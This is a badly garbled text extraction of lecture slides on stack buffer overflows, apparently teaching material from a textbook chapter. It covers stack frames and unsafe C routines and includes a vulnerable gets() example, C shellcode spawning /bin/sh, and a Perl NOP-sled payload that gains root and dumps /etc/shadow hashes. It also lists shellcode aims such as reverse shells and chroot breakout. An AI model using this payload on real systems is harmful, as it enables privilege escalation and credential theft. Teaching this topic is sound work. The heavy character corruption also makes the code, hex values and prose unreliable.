buffer overflow part 1

7/24/2019 Buffer Overflow Part 1

1/30

Chapter 10Bufer Overow


2/30

Be Reluctant to Trust


3/30

A Brief History of Some BufferOverflow Attacks


4/30

Buffer Overflow A very common attack

mechanismo First widely used by the Morris Worm in 1988

revention techni!ues known

"till o# ma$or concerno %e&acy o# bu&&y code in widely de'loyedo'eratin& systems and a''lications

o (ontinued careless 'ro&rammin& 'ractices by

'ro&rammers


5/30

Buffer Overflow/Buffer

OverrunA bufer overow) also known as a buferoverrun) is de*ned in the +,"- Glossary of KeyInformation Security Termsas #ollows.

/A condition at an inter#ace under whichmore in'ut can be 'laced into a bufer or

data holdin& area than the ca'acityallocated) overwritin& other in#ormation0Attackers e'loit such a condition to crash asystem or to insert

s'ecially cra#ted code that allowsthem to &ain control o# the system02


6/30

Buffer Overflow Basics

ro&rammin& errorwhen a 'rocessattem'ts to store databeyond the limits o# a*ed3si4ed bufer

Overwrites ad$acentmemory locationso %ocations could hold other

'ro&ram variables)

'arameters) or 'ro&ramcontrol ow data

Bufer could be locatedon the stack) in thehea') or in the data

section o# the 'rocess

Consequences: Corruption ofprogram data

Unexpectedtransfer ofcontrol

Memory access

violations Execution ofcode chosen byattacker


7/30

int main(int argc, char *argv[]) {int valid = FALSE;char str1[8];char str[8];

n!"t#tag(str1);g!ts(str);i$ (strncm%(str1, str, 8) == &)

valid = 'E;%rint$(+$$!r1- str1(.s), str(.s), valid(.d)/n, str1, str, valid);

0

(a) Basic bufer overow C code

cc 2g 2o +$$!r1 +$$!r13c 34+$$!r1S'A'+$$!r1- str1(S'A'), str(S'A'), valid(1) 34+$$!r1E56L67'5ALE+$$!r1- str1('5ALE), str(E56L67'5ALE), valid(&)

34+$$!r19A:67'9A:67'+$$!r1- str1(9A:67'), str(9A:67'9A:67'), valid(1)

(b) Basic bufer overow example runs

Figure 10.1 Basic Bufer Overow Example


8/30

emor!"ddress

Be#orege$s(s$r%)

"#$erge$s(s$r%)

Con$ains&alue o#

. . . . . . . . . . . .

bffffbf4 34fcffbf4 . . .

34fcffbf3 . . .

argv

bffffbf0 01000000

. . . .

01000000

. . . .

argc

bffffbec c6bd0340. . . @

c6bd0340. . . @

return addr

bffffbe8 08fcffbf

. . . .

08fcffbf

. . . .

old base ptr

bffffbe4 00000000. . . .

01000000. . . .

valid

bffffbe0 80640140. d . @

00640140. d . @

bffffbdc 54001540

T . . @

4e505554

N P U T

str14!"#

bffffbd8 5354415$% T & '

4$41444() & * +

str10!3#

bffffbd4 00850408

. . . .

4e505554

N P U T

str$4!"#

bffffbd0 30561540

0 , . @

4$41444(

) & * +

str$0!3#

. . . . . . . . . . . .

Figure 10.% Basic Bufer Overow '$ac &alues


9/30

Buffer Overflow Attacks

-o e'loit a bufer overow an attacker needs. -o identi#y a bufer overow vulnerability in some

'ro&ram that can be tri&&ered usin& eternally sourceddata under the attacker5s control

-o understand how that bufer is stored in memory anddetermine 'otential #or corru'tion

,denti#yin& vulnerable 'ro&rams can be doneby.

,ns'ection o# 'ro&ram source -racin& the eecution o# 'ro&rams as they 'rocess

oversi4ed in'ut

6sin& tools such as #u44in& to automatically identi#y

'otentially vulnerable 'ro&rams


10/30

Programming Language History At the machine level) data mani'ulated by machine instructions

eecuted by the com'uter 'rocessor are stored in either the

'rocessor5s re&isters or in memory

Assembly lan&ua&e 'ro&rammer is res'onsible #or the correct

inter'retation o# any saved data value. is it ,nt) oat) 'ointer)instruction7777

odern ig*levellanguages ave as$rong no$ion o# $!pe

and valid opera$ions

+o$ vulnerable $obufer overows

,oes incuroveread- somelimi$s on use

C and rela$edlanguages ave ig*level con$rol

s$ruc$ures- bu$ allowdirec$ access $omemor! ence are

vulnerable $o buferoverow

ave a large legac!o# widel! used-

unsa#e- and encevulnerable code


11/30

Program Loading into Process Memory


12/30

Stack Buffer Overflows

Occur when bufer is located on stack Also re#erred to as stack smashing 6sed by Morris Worm ( gets

:'loits included an unchecked bufer overow

Are still bein& widely e'loited

"tack #rame When one #unction calls another it needs somewhere to

save the return address Also needs locations to save the 'arameters to be

'assed in to the called #unction and to 'ossiblysave re&ister values


13/30

Example Stack Frame with

Function P Calling Function Q What does need to store

when callin& ;.o


14/30

Example of Function P Calling

Function QThe calling function P

1. Pushes the parameters for the

called function onto the stack(typically in reverse order of

declaration)

2. Executes the call instruction to

call the target function !hich

pushes the return address onto

the stack


15/30


Function QThe called function "

#. Pushes the current frame pointer value (!hich points to the calling

routine$s stack frame) onto the stack

%. &ets the frame pointer to 'e the current stack pointer value (that is the

address of the old frame pointer) !hich no! identifies the ne! stackframe location for the called function

. llocates space for local varia'les 'y moving the stack pointer do!n

to leave sufficient room for them

*. +uns the 'ody of the called function

,. s it exits it first sets the stack pointer 'ack to the value of the frame

pointer (effectively discarding the space used 'y local varia'les)

-. Pops the old frame pointer value (restoring the link to the calling

routine$s stack frame)

. Executes the return instruction !hich pops the saved address off thestack and returns control to the calling function


16/30


Function Q/astly the calling function P

10.Pops the parameters for the

called function off the stack

11. ontinues execution !ith the

instruction follo!ing the function

call.


17/30

Stack Overflow Example


18/30

Basic StackOverflow

Exampleint main (int argc, char *argv[])char tag[8];.next_tag(tag);hello(tag); // Assume

tag=name}//buffer 2


19/30

Form of Denial of Service "e&mentation #ault means the system is crashin&

and not available to users

More dan&erous i# the attacker can make thesystem do somethin& be#ore crashin& and maybenot crashin& at all

F f Cll


20/30

Forcing a function to CallItself

Attacker need to know what is the addresso# the #unction. run the code on a localmachine similar to the tar&et machine>O")

and use the debu&&er to &et the addresso# the #unction

Over3write the return address to make itthe address o# the #unction that the

attacker wants to eecute


21/30

emor!"ddress

Be#orege$s(inp)

"#$erge$s(inp)

Con$ains&alue o#

. . . . . . . . . . . .

bffffbe0 3e850408- . . .

00850408. . . .

tag

bffffbdc f0830408

. . . .

(4830408

. . . .

return addr

bffffbd8 e8fbffbf. . . .

e8ffffbf. . . .

old base ptr

bffffbd4 60840408

. . .

65666"68

e f g /

bffffbd0 30561540

0 , . @

616$6364

a b c d

bffffbcc 1b840408. . . .

55565"58U ,

inp1$!15#

bffffbc8 e8fbffbf. . . .

515$53542 ' % T

inp8!11#

bffffbc4 3cfcffbf

. . .

45464"48

7

inp4!"#

bffffbc0 34fcffbf

4 . . .

414$4344

& ) *

inp0!3#

. . . . . . . . . . . .

Figure 10./ Basic '$ac Overow '$ac &alues

2% 'ytes


22/30

Basic Stack

Overflow

Example


23/30

Buffer Overflow The potential for a 'uffer overflo! exists

any!here that data is copied or merged into a

'uffer !here at least some of the data are read

from outside the program. The possi'ility also exists that a program can

safely read and save input pass it around the

program and then at some later time in another

function unsafely copy it resulting in a 'ufferoverflo!

void getinp9c/ar :inp int si


24/30

void getinp9c/ar :inp; int si

puts9?+nput value ?=Afgets9inp; si

c/ar tFp16#A

sprintf9tFp; ?read val BsCn?; val=Aputs9tFp=A

D

int Fain9int argc; c/ar :argv#=>

c/ar buf16#Agetinp9buf; si


25/30

Table 10.2

Some Common Unsafe CStandard Library Routines

ge$s(car 4s$r) read line froF standard input into str

spri n$# (car 4s$r- car 4# orma$- . . . ) create str according to supplied forFat and variables

s$rca$(car 4des$- car 4src) append contents of string src to string dest

s$rcp!(car 4des$- car 4src) copE contents of string src to string dest

vspri n$# (car 4s$r - car 4#m$- va5l i s$ ap) create str according to supplied forFat and variables


26/30

Shellcode

(ode su''lied by attacker O#ten saved in bufer bein& overowed

-raditionally trans#erred control to a user command3line inter'retershell

Machine code "'eci*c to 'rocessor and o'eratin& system

-raditionally needed &ood assembly lan&ua&e skills to create

More recently a number o# sites and tools have been develo'ed thatautomate this 'rocess

Metas'loit ro$ect

rovides use#ul in#ormation to 'eo'le who 'er#orm

'enetration) ,?" si&nature develo'ment)and e'loit

research

i t i 9i t / : #=


27/30

int Fain9int argc; c/ar :argv#=>

c/ar :s/Ac/ar :args$#A

s/ I ?HbinHs/?Aargs0# I s/Aargs1# I NUJJA

eKecve9s/; args; NUJJ=AD

(a) ,esired sellcode code in C

nop

nop H H end of nop sledLFp find HH LuFp to end of code

cont pop Besi HH pop address of s/ off stacM into BesiKor BeaK;BeaK HH


28/30

G dir !l buffer4!rOsr!Kr!K 1 root MnoppiK 165"1 ul 1" 104( buffer4

G O/oaFiMnoppiK

G cat HetcHs/adoOcat HetcHs/adoO PerFission denied

G cat attacM1perl !e Qprint pacM9?7:?;?(0(0(0(0(0(0(0(0(0(0(0(0(0(0(0(0? .?(0(0(0(0(0(0(0(0(0(0(0(0(0(0(0(0? .?(0(0eb1a5e31c088460"8d1e8(5e088(? .?460cb00b8(f38d4e088d560ccd80e8e1? .

?ffffff$f6$6(6e$f"368$0$0$0$0$0$0? .?$0$0$0$0$0$0$0$038fcffbfc0fbffbf0a?=A

print ?O/oaFiCn?Aprint ?cat HetcHs/adoOCn?AQ

G attacM1 R buffer4nter value for naFe 7ello Eour EEE=*&0&pE is eS1&...HbinHs/...root

rootG1GrNJ+d4rGnMa"lK7".4UT4l('JM1133460((((("daeFon:114530((((("...nobodE:114530((((("MnoppiKG1Gv%)V)uGd%vuudVa78W0+dn&vH133460((((("...

Figure 10.8 Example '$ac Overow "$$ac


29/30

Stack Overflow Variants

Targetprogram canbe:

A trusted system utility

Network servicedaemon

Commonly used librarycode(image display tool)

Shellcodefunctions

&et up a listening service to launch a remote

shell !hen connected to.

Create a reverse shell that connects back tothe hacker

Use local exploits that establish a shell

Flush firewall rules that currently block otherattacks

Break out of a chroot (restricted execution)environment, giving full access to the system


30/30

2oadon

Cand!

buffer overflow part 1

Documents